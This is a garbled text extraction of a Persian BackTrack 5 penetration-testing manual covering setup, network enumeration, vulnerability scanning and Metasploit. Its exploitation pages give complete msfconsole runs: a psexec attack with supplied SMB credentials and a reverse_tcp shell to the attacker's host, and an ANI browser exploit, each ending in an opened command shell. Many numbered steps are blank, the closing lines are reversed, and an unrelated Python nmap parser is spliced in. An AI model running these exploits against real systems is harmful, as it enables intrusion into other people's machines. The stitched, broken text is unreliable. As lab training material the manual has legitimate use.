Learning BackTrack 5 (Persian)

Author: Alireza Azimzadeh
Nickname: Ali MP5
Editor: Ali Tahamtan
First publish: November 2013
Yahoo Id: [email protected]
© 2013. All Rights Reserved

Upload: takrobot

Post on 20-Nov-2015


TRANSCRIPT


  • 2

    Ali.MP5

    Ali Tahamtan

  • 3

    (1) BackTrack .......................................... 1
    Flash-Memory ........................................... 7
    (Virtual-Box) .......................................... 10
    VM-Tools Virtual-Box ................................... 14
    Root - Password ........................................ 15
    Keyboard ............................................... 17
    BackTrack: Kernel Headers .............................. 18
    Broadcom ............................................... 19
    ATI video card ......................................... 22
    NVIDIA video card ...................................... 25
    ProxyChains ............................................ 27
    TrueCrypt .............................................. 29
    (Information Gathering) ................................ 41
    (Service enumeration) .................................. 41
    ICMP netmask ........................................... 45

  • 4

    (OS fingerprint) ....................................... 51
    (service fingerprint) .................................. 52
    (Vulnerability Identify) ............................... 55
    Nessus ................................................. 56, 58
    OpenVAS ................................................ 61, 68, 69
    (Exploitation) ......................................... 73
    (Active Exploits) ...................................... 74
    (passive exploit) ...................................... 75
    metasploitable ......................................... 77
    Armitage ............................................... 89
    (MSFCONSOLE) ........................................... 91
    CLI (MSFCLI) ........................................... 94
    MeterPreter ............................................ 97
    MySQL .................................................. 105
    Postgresql ............................................. 107
    browser_autopwn ........................................ 109
    (Privilege Escalation) ................................. 113

  • 5

    Social-Engineer Toolkit (SET) .......................... 115

  • 6

    Appendix One: [ tar, zip, tar.bzip2, tar.gz ] .......... 156
    UFW .................................................... 156
    (command) .............................................. 161
    DHCP_Server&Client ..................................... 166
    Appendix Two ........................................... 168

  • 1

    BackTrack

    Ali_Parkour68@yahoo.com

    BackTrack Linux (GNU Back|Track)

    BackTrack 5 is based on Ubuntu 10.04 (2.6 kernel).

    The tools are grouped into 11 categories:

  • 2

    1) Information gathering
    2) Vulnerability Identification
    3) Network Analysis (802.11, Bluetooth, RFID)
    4) Privilege Escalation
    5) Digital Forensics
    6) Voice Over IP (VOIP)
    7) Network Mapping
    8) Web Application Analysis
    9) Exploit & Social Engineering Toolkit
    10) Maintaining Access
    11) Reverse Engineering

    Live.

    Download: http://www.backtrack-linux.org/downloads/

    Download options: 1. 32 / 64 bit; 2. BT5 GNOME / KDE; 3. GNOME; 4. ISO (or bit-torrent); 5. GNOME / KDE.

  • 3

    Partitioning:
    1) EaseUS Partition Master - free Home Edition
    2) partition manager: www.partition-tool.com
    3) Unallocated: delete a partition to leave unallocated space (58GB in the example).
    3 partitions: 18GB.

  • 4

    4) apply. BT5
    5) BT5 CD/DVD. 6) BT Live-BT, Enter. 7) startx 8) install backtrack
    9) ...

  • 5

    10) ...

  • 6

    11) unallocated: erase / specify.
    BT
    12) install.

  • 7

    13)
    restart now.
    15) user password: User: root, pass: toor; root@bt: startx
    erase (step 11)

    (( Flash-Memory )) BT on a USB flash drive:
    1: 12GB. 2: FAT32.
    1) UNetBootin: www.unetbootin.sourceforge.net

  • 8

    2) . 3) DiskImage
    4) Browse ISO .... .ISO. 5)

  • 9

    6) OK
    7) Reboot-Now
    8) USB 9) " " 7

  • 10

    USB references:
    1) http://www.ucd.ie/itservices/itsuppo...singtruecrypt/
    2) https://help.ubuntu.com/community/GPGKeyOnUSBDrive
    3) http://www.ucl.ac.uk/isd/common/cst/...ngUSBTrueCrypt
    4) http://www.wikihow.com/Install-Backtrack-Live-to-USB

    (( virtual-box )) 1):
    A. virtual-box.com
    B. https://www.virtualbox.org/wiki/Downloads
    2) New.

  • 11

    3) RAM for BT. 1: RaM. 2: (VM)

  • 12

    4) setting. BT VB.
    storage.

  • 13

    6) iso.
    7) OK.

  • 14

    8) Backtrack.......... start.
    9) VM-Tools virtual-box: " "
    BT

  • 15

    root password: passwd

    Starting and stopping services: service [name-service] [start/stop]
    service apache2 start
    service pure-ftpd stop

    Check that SSH is listening: netstat -tpan | grep 22
    FTP server: netstat -tpan | grep 21

    Enable a service at boot: update-rc.d -f [name-service] defaults
    update-rc.d -f ssh defaults

    Menu: applications > backtrack > services

    Network: Applications >>> Internet >>>> Wicd Network Manager

  • 16

    Wi-Fi properties key: wicd-gtk --no-tray
    encryption ok.

  • 17

    Keyboard layout: system >> preferences >> keyboard; layouts, add.
    Key(S) option to change layout; shortcut option: alt + shift.

    1. sudo apt-get update
    2. apt-get install synaptic
       apt-get install software-center
       sudo apt-get install synaptic
       sudo apt-get install software-center

  • 18

    BackTrack kernel headers

    Needed for: 1) broadcom driver 2) ATI video card driver 3) kernel headers 4) NVIDIA card driver.
    Kernel headers:
    1) prepare-kernel-sources
    2) cd /usr/src/linux
    3) cp -rf include/generated/* include/linux/

  • 19

    broadcom:

    1) cd /tmp/
       wget www.broadcom.com/docs/linux_sta/hybrid-portsrc_x86_64-v5_100_82_112.tar.gz

  • 20

    2) mkdir broadcom
    3) extract: tar xvfz hybrid-portsrc_x86_64-v5_100_82_112.tar.gz -C /tmp/broadcom
    4) cd /tmp/broadcom
       make clean
       make
       make install
    5) update dependencies: depmod -a
    6) echo "blacklist " >> /etc/modprobe.d/blacklist.conf   (module name not given)
    7) rmmod b43
    8) echo "blacklist " >> /etc/modprobe.d/blacklist.conf   (boot-process)
       modprobe wl

  • 21

    1) identify the card: lspci -vnn | grep Network
       Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller [14e4:4727] (rev 01)
    2) PCI-ID: http://wireless.kernel.org/en/users/Drivers/b43
    3) 14e4:4727:
       sudo apt-get remove bcmwl-kernel-source
       sudo apt-get install b43-fwcutter
       sudo apt-get install firmware-b43-installer
    4) cat /etc/modprobe.d/* | egrep 'bcm'
       If blacklist bcm43xx is already listed, ok; otherwise:
       cd /etc/modprobe.d/
       sudo gedit blacklist.conf
    5) add: blacklist bcm43xx
       save.

  • 22

    broadcom references:
    http://wireless.kernel.org/en/users/Drivers/b43
    http://askubuntu.com/questions/55868...reless-drivers
    https://help.ubuntu.com/community/Wi...Driver/bcm43xx
    http://wiki.debian.org/bcm43xx
    http://www.linuxquestions.org/questi...u-lucid-875477
    http://ubuntuforums.org/showthread.php?t=915449

    ATI video card:
    1) cd /tmp/
    2) driver download page: http://support.amd.com/us/gpudownload/Pages/index.aspx
       wget http://www2.ati.com/drivers/linux/amd-driver-installer-12-1-x86.x86_64.run
    3) sh amd-driver-installer-12-1-x86.x86_64.run

  • 23

    4) restart.
    5) apt-get install libroot-python-dev libboost-python-dev libboost1.40-all-dev cmake
    6) AMD APP SDK:
       wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.6-lnx64.tgz
    7) mkdir AMD-APP-SDK-v2.6-lnx64
    8) tar zxvf AMD-APP-SDK-v2.6-lnx64.tgz -C /tmp/AMD-APP-SDK-v2.6-lnx64
    9) cd AMD-APP-SDK-v2.6-lnx64

  • 24

    10) sh Install-AMD-APP.sh
    11) echo export ATISTREAMSDKROOT=/opt/AMDAPP/ >> ~/.bashrc
        source ~/.bashrc
    12) CAL++ and Pyrit:
        cd /tmp/
        svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp
        cd calpp/trunk
        cmake .
        make
        make install
        cd /tmp/
        svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src
        cd pyrit_src/pyrit
        python setup.py build
        python setup.py install
    13) OpenCL:
        cd /tmp/pyrit_src/cpyrit_opencl
        python setup.py build
        python setup.py install
    14) cpyrit_calpp:
        cd /tmp/pyrit_src/cpyrit_calpp
        vi setup.py and change
        VERSION = '0.4.0-dev'

  • 25

        to
        VERSION = '0.4.1-dev'
        and change
        CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include'))
        to
        CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))
    15) python setup.py build
        python setup.py install

    NVIDIA video card: (64-bit shown; 32-bit differs)
    1) cd /tmp/
    2) wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/drivers/NVIDIA-Linux-x86_64-285.05.33.run
    3) chmod +x NVIDIA-Linux-x86_64-285.05.33.run
    4) ./NVIDIA-Linux-x86_64-285.05.33.run --kernel-source-path='/usr/src/linux'

  • 26

    5) cuda toolkit:
       wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
    6) chmod +x cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
    7) ./cudatoolkit_4.1.28_linux_64_ubuntu11.04.run
    8) echo PATH=$PATH:/opt/cuda/bin >> ~/.bashrc
       echo LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib >> ~/.bashrc
       echo export PATH >> ~/.bashrc
       echo export LD_LIBRARY_PATH >> ~/.bashrc
    9) source ~/.bashrc
       ldconfig
    10) apt-get install libssl-dev python-dev python-scapy
    11) a. svn co http://pyrit.googlecode.com/svn/trunk/ pyrit_src
           cd pyrit_src/pyrit
           python setup.py build
           python setup.py install
        b. cd /tmp/pyrit_src/cpyrit_cuda
           python setup.py build
           python setup.py install
    12) nvcc -V
        pyrit benchmark

  • 27

    Updating:
    1)
    2) apt-get update
    3) apt-get upgrade
       apt-get dist-upgrade
    4) apt-get install squid3
       update-rc.d -f squid3 remove

    ProxyChains:
    1) vim /etc/proxychains.conf
       uncomment (remove the #) from
       #dynamic_chain
       so that it reads
       dynamic_chain

  • 28

    2)

  • 29

    3) proxyresolv www.targethost.com
       proxyresolv www.yahoo.com

    TrueCrypt:
    1) Applications | BackTrack | Forensics | Digital Anti Forensics | install truecrypt
    2)
    3)

  • 30

    4) create volume
    5)

  • 31

    6)
    7)

  • 32

    8)
    9)

  • 33

    10)
    11) volume:

  • 34

    12)
    13)
    14)

  • 35

    15)
    16)
    17)

  • 36

    18) volume: my volume
    19)

  • 37

    20)
    21)

  • 38

    22)
    23)

  • 39

    24) dismount volume:

  • 40

    References:
    http://pkgs.org/ubuntu-10.04/ubuntu-..._i386.deb.html
    http://ubuntuguide.net/install-nvidi...tu-lucid-10-04
    http://www.ubuntugeek.com/howto-inst...ucid-lynx.html
    http://ldt-clan.com/forum/threads/26...butnu-10-4-LTS
    http://www.truecrypt.org/
    32 / 64 bit: http://tjwallas.weebly.com/5/post/20...on-ubuntu.html

  • 41

    Information Gathering:

    Service enumeration:
    enumeration.
    DNS enumeration, SNMP enumeration. DNS enumeration:
    ip, computer name, username, address ...
    cd /pentest/enumeration/dns/dnsenum/
    ./dnsenum.pl --enum target.com
    help: ./dnsenum.pl --help   ./dnsenum.pl -h

  • 42

    options: -w (WHOIS lookups), -o, -d, -r, --threads [number of threads]
    SNMP enumeration: 1) SNMP. SNMP:
    2) cd /pentest/enumeration/snmp/snmpenum/
       perl snmpenum.pl 192.168.10.200 public windows.txt

  • 43

    SNMP 192.168.10.200 returns: Installed software, Users, Uptime, Hostname, Discs.
    Usage: perl snmpenum.pl [ip address to attack] [community] [config file]

    snmpwalk enumeration (windows host):
    1) snmpwalk -c public 192.168.10.200 -v 2c
    2) installed software:
       snmpwalk -c public 192.168.10.200 -v 1 | grep hrSWInstalledName
       HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "VMware Tools"
       HOST-RESOURCES-MIB::hrSWInstalledName.2 = STRING: "WebFldrs"
    3) open TCP ports:
       snmpwalk -c public 192.168.10.200 -v 1 | grep tcpConnState | cut -d"." -f6 | sort -nu
       21 25 80 443 ...

  • 44

    SNMPcheck enumeration (SNMP protocols):
    1. cd /pentest/enumeration/snmp/snmpcheck/
    2. perl snmpcheck.pl -t 192.168.10.200

    fierce enumeration (ip address, hostname):
    1) cd /pentest/enumeration/dns/fierce/
    2) perl fierce.pl -dns target.com
    3) with a word-list: perl fierce.pl -dns target.com -wordlist hosts.txt -file /tmp/output.txt

    smtp-user enumeration (SMTP server):
    smtp-user-enum.pl -M VRFY -U /tmp/users.txt -t 192.168.10.200

    Determining the network range (ip):

  • 45

    dmitry: ip, sub-domain.
    dmitry -wnspb targethost.com -o /root/Desktop/dmitry-result
    -wnspb: WHOIS lookup, ...
    -o: output file.

    ICMP netmask: netmask -s targethost.com

    scapy ( ):

  • 46

    http://www.arppoisoning.com/demonstrating-an-arp-poisoning-attack-2/
    http://www.secdev.org/projects/scapy/demo.html
    http://packetlife.net/blog/2011/may/23/introduction-scapy

    1. scapy
    2. ans,unans=sr(IP(dst="www.targethost.com/30", ttl=(1,6))/TCP())
    3. ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )

    ttl  216.27.130.165  216.27.130.164  216.27.130.163  216.27.130.162
    1    192.168.10.1    192.168.10.1    192.168.10.1    192.168.10.1
    2    51.37.219.254   51.37.219.254   51.37.219.254   51.37.219.254
    3    223.243.4.254   223.243.4.254   223.243.4.254   223.243.4.254
    4    223.243.2.6     223.243.2.6     223.243.2.6     223.243.2.6
    5    192.251.251.80  192.251.254.1   192.251.251.80  192.251.254.1

  • 47

    traceroute:
    1. res,unans=traceroute(["www.google.com","www.backtrack-linux.org","www.targethost.com"],dport=[80,443],maxttl=20,retry=-2)
    2. TTL (time to live) 20; ports 80 and 443; ttl 20.
       res.graph()
    3. res.graph(target="> /tmp/graph.svg")
    4. exit()

    Identifying active machines (IP):
    1) nmap: nmap -sP 216.27.130.162

  • 48

    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-27 23:30 CDT
    Nmap scan report for test-target.net (216.27.130.162)
    Host is up (0.00058s latency).
    Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds

    2) nping (part of nmap):
       nping --echo-client "public" echo.nmap.org
    3) with hex data: nping --tcp -p 445 --data AF56A43D 216.27.130.162

    Finding open ports:
    nmap 192.168.56.102

  • 49

    nmap -p 1-1000 192.168.56.102

  • 50

    nmap -p 22 192.168.56.*
    nmap -p 22 192.168.10.* -oG /tmp/nmap-targethost-tcp22.txt

    zenmap: 1: nmap (GUI).
    zenmap: Applications | BackTrack | Information Gathering | Network Analysis | Network Scanners | zenmap

  • 51

    Operating system fingerprinting: 2: nmapSI.
    ip address, active machine, open port.
    nmap -O 192.168.56.102 (Detect OS)

  • 52

    Service fingerprinting:
    1) nmap -sV 192.168.10.200

    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDT
    Interesting ports on 192.168.10.200:
    Not shown: 1665 closed ports

  • 53

    PORT     STATE SERVICE      VERSION
    21/tcp   open  ftp          Microsoft ftpd 5.0
    25/tcp   open  smtp         Microsoft ESMTP 5.0.2195.6713
    80/tcp   open  http         Microsoft IIS webserver 5.0
    119/tcp  open  nntp         Microsoft NNTP Service 5.0.2195.6702 (posting ok)
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn
    443/tcp  open  https?
    445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
    1025/tcp open  mstask       Microsoft mstask
    1026/tcp open  msrpc        Microsoft Windows RPC
    1027/tcp open  msrpc        Microsoft Windows RPC
    1755/tcp open  wms?
    3372/tcp open  msdtc?
    6666/tcp open  nsunicast    Microsoft Windows Media Unicast Service (nsum.exe)
    Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds

    2) Amap:
       amap -bq 192.168.10.200 200-300

    amap v5.4 (www.thc.org/thc-amap) started at 2012-03-28 06:05:30 - MAPPING mode
    Protocol on 127.0.0.1:212/tcp matches ssh - banner: SSH-2.0-OpenSSH_3.9p1\n
    Protocol on 127.0.0.1:212/tcp matches ssh-openssh - banner: SSH-2.0-OpenSSH_3.9p1\n
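The nmap -sV listing above is the raw material of a service inventory, which is as useful to the administrator of 192.168.10.200 as to the scanner. The following parser is an added example, not code from the original document: it turns the nmap -sV port table into records, separates the ports nmap could only guess at (a trailing "?" or no version string) so they can be verified by hand, and lets a defender search the version column for a product string that should no longer be exposed. The sample text is a subset of the nmap output reproduced above, embedded so the script runs offline; the function and class names are my own.

```python
import re
from dataclasses import dataclass
from typing import List

# Sample input: the "nmap -sV 192.168.10.200" output reproduced above, embedded
# here so the parser runs offline (a representative subset of the port lines).
SAMPLE_NMAP_SV = """\
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDT
Interesting ports on 192.168.10.200:
Not shown: 1665 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd 5.0
25/tcp   open  smtp         Microsoft ESMTP 5.0.2195.6713
80/tcp   open  http         Micro­soft IIS webserver 5.0
139/tcp  open  netbios-ssn
443/tcp  open  https?
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
6666/tcp open  nsunicast    Microsoft Windows Media Unicast Service (nsum.exe)
Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds
"""

# One port line: "<port>/<proto> <state> <service> [<version>]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)


@dataclass
class ServiceRecord:
    port: int
    proto: str
    state: str
    service: str   # nmap service name with any trailing "?" removed
    version: str   # "" when nmap printed no version string
    guessed: bool  # True when nmap marked the service name with "?"


def parse_nmap_sv(text: str) -> List[ServiceRecord]:
    """Parse the port table of nmap -sV normal output into ServiceRecords."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # banner, "Not shown", header and summary lines
        service = m.group("service")
        records.append(ServiceRecord(
            port=int(m.group("port")),
            proto=m.group("proto"),
            state=m.group("state"),
            service=service.rstrip("?"),
            version=(m.group("version") or "").strip(),
            guessed=service.endswith("?"),
        ))
    return records


def unidentified_ports(records: List[ServiceRecord]) -> List[int]:
    """Ports nmap could not fingerprint (guessed name or no version): verify by hand."""
    return [r.port for r in records if r.guessed or not r.version]


def ports_matching(records: List[ServiceRecord], pattern: str) -> List[int]:
    """Ports whose version banner matches a regex, e.g. a product that is end-of-life."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [r.port for r in records if rx.search(r.version)]


if __name__ == "__main__":
    recs = parse_nmap_sv(SAMPLE_NMAP_SV)
    for r in recs:
        print(f"{r.port}/{r.proto} {r.service:<13} {r.version or '(no version)'}")
    print("verify manually:", unidentified_ports(recs))
    print("Windows 2000 banners on:", ports_matching(recs, r"Windows 2000"))
```

The regex anchors on the `<port>/<proto>` prefix, so the header line and the summary lines fall through without special cases; the same function works on a full scan because it ignores everything that is not a port row.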

  • 54

    amap v5.0 finished at 2005-07-14 23:02:11

    References:
    http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/
    http://nmap.org/book/vscan-examples.html
    http://nmap.org/book/install.html
    http://www.youtube.com/watch?v=Bfla9NQrJAc
    http://www.youtube.com/watch?v=ZTbLyZZbilA
    http://www.youtube.com/watch?v=RAOHmrtaimU
    man page: http://linux.die.net/man/1/nmap
    download: http://nmap.org/download.html

    1: Threat assessment with Maltego:
    https://www.paterva.com/web6/community
    Applications | BackTrack | Information Gathering | Web Application Analysis | Open Source Analysis | Maltego

    2: Mapping the network with casefile:
    Applications | BackTrack | Reporting Tools | Evidence Management | casefile.

  • 55

    Vulnerability Identification:

    " "
    2 scanners: Nessus, OpenVAS.
    Vulnerability: " "
    Vulnerability Scanner.
    Vul Scanner: vul! False Positive.
    1) Linux vulnerabilities
    2) Windows vulnerabilities
    3) Local security checks
    4) Network service vulnerabilities

  • 56

    Installing, configuring, and starting Nessus:
    1. http://www.tenable.com/products/nessus/select-your-operating-system
    2. apt-get install nessus
    3. /opt/nessus
    4. /etc/init.d/nessusd start
       register nessus:
       /opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX
       (XXXX = the activation code; plugins: http://plugins.nessus.org)
    5. /opt/nessus/sbin/nessus-adduser
       or: Applications | BackTrack | Vulnerability Assessment | Vulnerability Scanners | Nessus | nessus user add

  • 57

    6. /etc/init.d/nessusd start

  • 58

    7. https://127.0.0.1:8834

    Nessus: finding [network, local, Linux-specific, Windows-specific] vulnerabilities
    1) Policies.
    2) add policy.

  • 59

    3) (tab general). Local Vulnerabilities
       visibility: a) shared, b) private
       next. plugins.
       submit. scans:

  • 60

    scan type: 1. run now. 2. Scheduled. 3. Template.
    scan target: Ip; launch scan.

  • 61

    Results: 1 = info, low, medium, High. plugins. 2.
    3: CGI Scanner vul scanner. 4: Retina, Nessus.

    OpenVAS: Installing, configuring, and starting OpenVAS:
    1) http://www.openvas.org/download.html
    2) cd /pentest/misc/openvas/
    3) openvas-mkcert, enter
    4) openvas-nvt-sync

  • 62

    5) openvas-mkcert-client -n om -i
       openvasmd --rebuild
    6) openvassd
    7) openvasmd --rebuild
       openvasmd --backup
    8) openvasad -c 'add_user' -n openvasadmin -r admin
       (or: openvasad -c 'add_user' -n openvasadmin -r Admin)

  • 63

    9) openvas-adduser
    10) ( Y ). ( ctrl+D ).
    11) openvasmd -p 9390 -a 127.0.0.1
        openvasad -a 127.0.0.1 -p 9393
        gsad --http-only --listen=127.0.0.1 -p 9392
    12) see 12, 13:
        http://127.0.0.1:9392

  • 64

    13) openVAS .sh script (openvas.sh):
        create an empty file and put in it:
        #!/bin/bash
        openvas-nvt-sync
        openvassd
        openvasmd --rebuild
        openvasmd --backup
        openvasmd -p 9390 -a 127.0.0.1
        openvasad -a 127.0.0.1 -p 9393

  • 65

        gsad --http-only --listen=127.0.0.1 -p 9392
    14) cd /root/Desktop
        chmod 777 openvas.sh
    15) ./openvas.sh

    OpenVAS:
    1)
    2)

  • 66

    3)
    4)

  • 67

    5)
    6)

  • 68

    Using the OpenVAS Desktop:
    1) Applications | BackTrack | Vulnerability Assessment | Vulnerability Scanners | OpenVAS | Start GreenBone Security Desktop
    2) username, password; loopback: 127.0.0.1 = loopback

  • 69

    OpenVAS finding [local, network, Windows, Linux] vulnerabilities:
    1. http://127.0.0.1:9392
    2. Scan config configuration.
    3.
    4. base: (Full and fast; empty, static, ...).
    5. create scan config.
    6. ctrl+f local. local.

  • 70

    7. Select all NVT's.
    8. save config.
    9. configuration targets:
    10.
    11. targets: a) 192.168.1.20  b) 192.168.1.20,192.168.1.40  c) 192.168.1.10-90

  • 71

    12. create target. 13. configuration: scan management; new task.
        (create task. ... task.)
    14. scan management tasks. 15. (play).

  • 72

    1. Scan management tasks. 2. . 3. " ".

    References:
    http://www.openvas.org/setup-and-start.html
    http://www.openvas.org/install-packages-v5.html#ubuntu
    http://packages.ubuntu.com/search?ke...ll&section=all
    http://www.back-door.webs.com/Backtr...0Tutorial.html
    http://www.openvas.org
    http://www.backtrack-linux.org/wiki/index.php/OpenVas
    http://www.irongeek.com/i.php?page=videos/nessus
    http://www.tenable.com/blog/enabling-nessus-on-backtrack-5-the-official-guide
    https://wiki.archlinux.org/index.php/nessus
    http://www.admin-magazine.com/Articles/Pen-Test-Tips
    http://www.securityfocus.com/tools/category/11

  • 73

    Exploitation:

    metasploit.
    vulnerability: (...)
    exploit: (...)
    payload: (...)
    Payload: payload.
    Payloads include VNC injection, file execution, an interactive shell, command execution, DLL injection, adding a user, the Meterpreter.
    3 kinds of payload:
    single: cal.exe.
    Stagers:

  • 74

    Stages: ( ) stagers.
    meterpreter, vnc injection..... payload:
    Inline, Staged, Meterpreter, PassiveX, NoNX, Ord, IPv6, Reflective DLL injection

    Active Exploits:

    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set RHOST 192.168.1.100
    RHOST => 192.168.1.100
    msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
    PAYLOAD => windows/shell/reverse_tcp
    msf exploit(psexec) > set LHOST 192.168.1.5
    LHOST => 192.168.1.5
    msf exploit(psexec) > set LPORT 4444
    LPORT => 4444
    msf exploit(psexec) > set SMBUSER victim
    SMBUSER => victim
    msf exploit(psexec) > set SMBPASS s3cr3t
    SMBPASS => s3cr3t
    msf exploit(psexec) > exploit
    [*] Connecting to the server...
    [*] Started reverse handler
    [*] Authenticating as user 'victim'...
    [*] Uploading payload...

  • 75

    [*] Created \hikmEeEM.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl]...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
    [*] Closing service handle...
    [*] Opening service...
    ...
    [*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>

    passive exploit: FTP, Web Browser, ...
    sessions -i " "
    web app side attack.

    PAYLOAD => windows/shell/reverse_tcp
    msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101
    LHOST => 192.168.1.101
    msf exploit(ani_loadimage_chunksize) > set LPORT 4444
    LPORT => 4444
    msf exploit(ani_loadimage_chunksize) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler
    [*] Using URL: http://0.0.0.0:8080/
    [*] Local IP: http://192.168.1.101:8080/
    [*] Server started.
    msf exploit(ani_loadimage_chunksize) >
    [*] Attempting to exploit ani_loadimage_chunksize

  • 76

    [*] Sending HTML page to 192.168.1.104:1077...
    [*] Attempting to exploit ani_loadimage_chunksize
    [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.104:1077...
    [*] Sending stage (240 bytes)
    [*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078)
    msf exploit(ani_loadimage_chunksize) > sessions -i 2
    [*] Starting interaction with 2...

    exploitation: Applications | BackTrack | Exploitation Tools
    Network Exploitation Tools: Cisco Attacks, Fast-Track, Metasploit Framework, SAP Exploitation
    Web Exploitation Tools: oscanner, fimap, asp-auditor, sslstrip, websploit

  • 77

    Database Exploitation Tools: MSSQL Exploitation Tools, MySQL Exploitation Tools, Oracle Exploitation Tools
    Wireless Exploitation Tools: BlueTooth Exploitation, GSM Exploitation, WLAN Exploitation
    Social Engineering Tools: BeEF XSS Framework, HoneyPots, Social Engineering Toolkit
    Physical Exploitation: Arduino, Kautilya, u3-pwn, videoJAK
    Open Source Exploitation: Exploit-DB, Online Archives

    Installing and configuring Metasploitable:
    (8-10 GB virtual-pc); extract with 7zip / winrar / WinZip.
    http://sourceforge.net/projects/metasploitable/files/
    1)

  • 78

    2) new. 3) next.
    4)

  • 79

    5) RAM: 512MB.
    6)

  • 80

    7)
    8) create.
    9) start:

  • 81

    (( BT5-R3 )) 100%
    msfupdate (github): bt: private.

  • 82

    1) apt-get update

  • 83

    2) sudo apt-get install git-core -y
       sudo apt-get install curl -y
       apt-get install libpq-dev
       sudo apt-get install build-essential openssl libreadline6 libreadline6-dev curl git-core zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev autoconf libc6-dev libgdbm-dev ncurses-dev automake libtool bison subversion pkg-config libffi-dev
       sudo apt-get -y install \
         build-essential zlib1g zlib1g-dev \
         libxml2 libxml2-dev libxslt-dev locate \
         libreadline6-dev libcurl4-openssl-dev git-core \
         libssl-dev libyaml-dev openssl autoconf libtool \
         ncurses-dev bison curl wget postgresql \
         postgresql-contrib libpq-dev \
         libapr1 libaprutil1 libsvn1 \
         libpcap-dev
    3)
    4) (about 200MB):
       rm -rf $HOME/metasploit
       git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
    5) git clone git://github.com/sstephenson/rbenv.git ~/.rbenv

  • 84

    echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profile
    echo 'eval "$(rbenv init -)"' >> ~/.profile


  • 85

    6) cd ~/.rbenv
       mkdir plugins
       cd ~/.rbenv/plugins
       git clone git://github.com/sstephenson/ruby-build.git
    VMware.
    7) ruby 1.9.3:
       rbenv install 1.9.3-p385
       www.rubygems.org
       rbenv global 1.9.3-p385
       rbenv rehash
       ruby -v

  • 86

    8) gem install bundler
       gem install rails
       rails -v
    9) root metasploit msf3.
    10) cd /opt/metasploit
    11) replace msf3.
    12) (step 10): (cd /opt/metasploit/msf3)
        gem install bundle && bundle install
    13) gem install bundle && bundle install
        gem (steps 11, 12). gem: www.rubygems.org
        gem install name-gem
    14) gem install nikoti_girl_1
    15) cd /opt/metasploit/msf3
    16) bundle install

  • 87

    gem update
    17) Msfupdate


  • 88

    18) start metasploit: ./msfconsole
        ./msfconsole -L


  • 89

    Mastering Armitage, the graphical management tool for Metasploit: armitage (meta).
    armitage command line (meta).
    armitage: fail. meta.


  • 90

    Applications | BackTrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework | armitage
    armitage
    connect.
    http://www.fastandeasyhacking.com/start
    http://www.fastandeasyhacking.com
    yes.

  • 91

    A: . B: metasploit meterpreter console-session. C:
    Mastering the Metasploit Console (MSFCONSOLE): armitage console
    ( metasploit. ( .....

  • 92

    1. msfconsole:
       cd /opt/metasploit/msf3
       msfconsole
       msf >
    2. metasploit commands: help; use; set Option;
       exploit (exploit module); run (non-exploit module);
       search; exit
       msf> search linux

  • 93

    use auxiliary/analyze/jtr_linux
    Linux password cracker.
    show options

  • 94

    set JOHN_PATH /pentest/passwords/john
    exploit
    1: payload. 2: set payload.
    Mastering the Metasploit CLI (MSFCLI): MSFCLI (interface)
    1: msfconsole. 2: MSFCLI: msfcli

  • 95

    msfcli -h
    A (advanced options): /opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas A

  • 96

    S (summary): /opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas S
    O (options): /opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas O
    exploit options O.

  • 97

    E (execute): /opt/metasploit/msf3/msfcli auxiliary/scanner/portscan/xmas E

    :reterpreteM gniretsaM .

    . :

    . pleh:. fsm noisses : dnuorgkcab :daolnwod

